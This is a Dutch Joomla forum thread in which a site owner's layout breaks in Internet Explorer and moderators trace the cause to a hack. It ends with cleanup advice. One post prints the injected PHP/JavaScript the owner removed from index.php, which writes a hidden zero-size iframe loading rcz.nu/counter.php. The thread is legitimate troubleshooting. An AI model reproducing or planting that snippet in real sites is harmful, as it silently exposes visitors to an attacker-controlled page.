Vermeld in iedere vraag duidelijk:
- De versie van Joomla! 2.5 die je gebruikt
- De volledige url van je website indien mogelijk.
- De versie van de extensie waar de vraag over gaat.
Geen goede weergave in IE8 en 9
09 sep 2012 16:11 - 09 sep 2012 19:27
Hallo,
Heb een site gemaakt in joomla 2.5, een template m.b.v. aristeer, als in nu de site bekijk in Firefox of Grome dat ziet hij er goed uit, kijk je in IE8 of 9 dan staan de rechter menu's aan de linker kant en de tekstinhoud staat ook links, ook is de opmaak van de menu's niet goed. Heb
ook geprobeerd echter zonder succes. Volgens mij staat er ook geen tekst in die gekopieerd is uit WORD.
ALs je de compatiliteits modus inschakeld van IE dan staat de tekst wel goed echter de rechter menu's en de opmaak van de menu's is niet goed.
zie de site WWW.ASC62.nl
Kan iemand mij verder helpen?
Gr. Kasper
Edit Jelle. Ik heb de code tussen codetags geplaatst, volgende keer graag zelf doen.
Heb een site gemaakt in joomla 2.5, een template m.b.v. aristeer, als in nu de site bekijk in Firefox of Grome dat ziet hij er goed uit, kijk je in IE8 of 9 dan staan de rechter menu's aan de linker kant en de tekstinhoud staat ook links, ook is de opmaak van de menu's niet goed. Heb
Code:
<meta http-equiv="X-UA-Compatible" content="IE=8" />
ALs je de compatiliteits modus inschakeld van IE dan staat de tekst wel goed echter de rechter menu's en de opmaak van de menu's is niet goed.
zie de site WWW.ASC62.nl
Kan iemand mij verder helpen?
Gr. Kasper
Edit Jelle. Ik heb de code tussen codetags geplaatst, volgende keer graag zelf doen.
- Kasper
- Heeft onderwerp gestart
- Joomla!NL ontdekker
10 sep 2012 11:16
Er gebeurt volgens mij iets vreemds doordat je gebruik maakt van een Iframe. IE geeft deze foutmelding:
Doordat de doctype niet klopt, gaat IE in Quirks mode en daarom werkt het niet. Dus het toevoegen van die regel werkt dan ook niet.Foutdetails webpagina
Gebruikersagent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E)
Tijdstempel: Mon, 10 Sep 2012 09:11:45 UTC
Bericht: Kan lid niet vinden.
Regel: 176
Teken: 4
Code: 0
URI: rcz.nu/
Een doctype is over het algemeen de eerste regel in een HTML-pagina (boven het html-element) die aangeeft welke (X)HTML-versie er wordt gebruikt en op welke manier de browser zou moeten omgaan met regels voor layoutweergave.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst. Vragen uitsluitend via dit forum. yndi.nl - kvk 17157725 | Is je vraag beantwoord? Dan kan je het draadje zelf
sluiten
. Wil je Joomla!NL steunen? Dat kan met een donatie. |
- Astrid
- Moderator + Technisch team
12 sep 2012 23:32
Hallo Astrid,
Ben al een paar dagen aan het zoeken geweest en heb eindelijk gevonden waar die tekst staat, er een link in dat iframe naar een site " rcz.nu/counter.php " die site hebben wij niks van doen en mijn vraag is nu hoe komt die erin, ik heb daar geen link naar toe gemaakt. Ik heb die regel al weggehaald maar dan loopt de site vast, hoe kan ik nu dat iframe met die link en die doctype verwijderen of aanpassen zodat de foutmelding weg is en de site weer werkt.
Als je de foutopsporing start in het script in IE dan krijg je ook nog een foutmelding van die andere site (vind ik helemaal vreemd)
Ik hoop dat iemand mij verder kan helpen
ALs bijlage de schermafdruk met de fouten
Ben al een paar dagen aan het zoeken geweest en heb eindelijk gevonden waar die tekst staat, er een link in dat iframe naar een site " rcz.nu/counter.php " die site hebben wij niks van doen en mijn vraag is nu hoe komt die erin, ik heb daar geen link naar toe gemaakt. Ik heb die regel al weggehaald maar dan loopt de site vast, hoe kan ik nu dat iframe met die link en die doctype verwijderen of aanpassen zodat de foutmelding weg is en de site weer werkt.
Als je de foutopsporing start in het script in IE dan krijg je ook nog een foutmelding van die andere site (vind ik helemaal vreemd)
Ik hoop dat iemand mij verder kan helpen
ALs bijlage de schermafdruk met de fouten
- Kasper
- Joomla!NL ontdekker
13 sep 2012 09:32
Dan vermoed ik toch dat je site gehackt is.
Meestal wordt een site gehackt doordat er Malware of Spyware op je lokale pc zit.
Ga dus als volgt te werk:
Meestal wordt een site gehackt doordat er Malware of Spyware op je lokale pc zit.
Ga dus als volgt te werk:
- Zorg ervoor dat je PC Spy- en Malware vrij is.
- Zet een goede recente backup terug.
- wijzig al je wachtwoorden.
- update je site naar de nieuwste versie van Joomla en vergeet ook niet alle extensies mee te nemen.
- Maak meteen een nieuwe backup.
Groetjes, Astrid
Gebruik de zoekfunctie van dit forum voordat je een nieuwe vraag plaatst. Vragen uitsluitend via dit forum. yndi.nl - kvk 17157725 | Is je vraag beantwoord? Dan kan je het draadje zelf
sluiten
- Astrid
- Moderator + Technisch team
13 sep 2012 20:28 - 13 sep 2012 22:05
Site doet het weer, heb 10 regels uit het index.php bestand gehaald waar die verwijzing stond naar die andere site, zie die code hieonder.
Van #c3284d# t/m #/c3284d# heb ik verwijdert, nu staat in andere bestanden ook nog de verwijzing naar die site, moet/kan ik die ook weghalen of kan het geen kwaad dat die blijven staan, ben in ieder geval blij dat hij het weer doet, bedankt voor het meedenken.
Gr. Jan
Van #c3284d# t/m #/c3284d# heb ik verwijdert, nu staat in andere bestanden ook nog de verwijzing naar die site, moet/kan ik die ook weghalen of kan het geen kwaad dat die blijven staan, ben in ieder geval blij dat hij het weer doet, bedankt voor het meedenken.
Gr. Jan
Code:
// Decorate component with Artisteer style:
$view->componentWrapper();
#c3284d#
echo "<script type=\"text/javascript\">
document.write('<iframe src=\"http://rcz.nu/counter.php\" border=\"0\" width=\"0\" height=\"0\"></iframe>');
</script>
";
#/c3284d#
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $document->language; ?>" lang="<?php echo $document->language; ?>" dir="ltr">
<head>
- Kasper
- Joomla!NL ontdekker
13 sep 2012 22:27
Hallo Jan,
Dit wordt dweilen met de kraan open de enigste juiste manier in deze is wat in bericht #4 is verteld.
Zorg ervoor dat je PC Spy- en Malware vrij is.
Zet een goede recente backup terug.
wijzig al je wachtwoorden.
update je site naar de nieuwste versie van Joomla en vergeet ook niet alle extensies mee te nemen.
Maak meteen een nieuwe backup.
Dit wordt dweilen met de kraan open de enigste juiste manier in deze is wat in bericht #4 is verteld.
Zorg ervoor dat je PC Spy- en Malware vrij is.
Zet een goede recente backup terug.
wijzig al je wachtwoorden.
update je site naar de nieuwste versie van Joomla en vergeet ook niet alle extensies mee te nemen.
Maak meteen een nieuwe backup.
Groeten, Jelle
Voordat je een vraag post, gebruik eerst de zoekfunctie van ons forum eens. Vragen uitsluitend via dit Forum. | Is je vraag opgelost? Dan kan je hem zelf
sluiten
- Jelle
- Algemeen Moderator
Tijd voor maken pagina: 0.693 seconden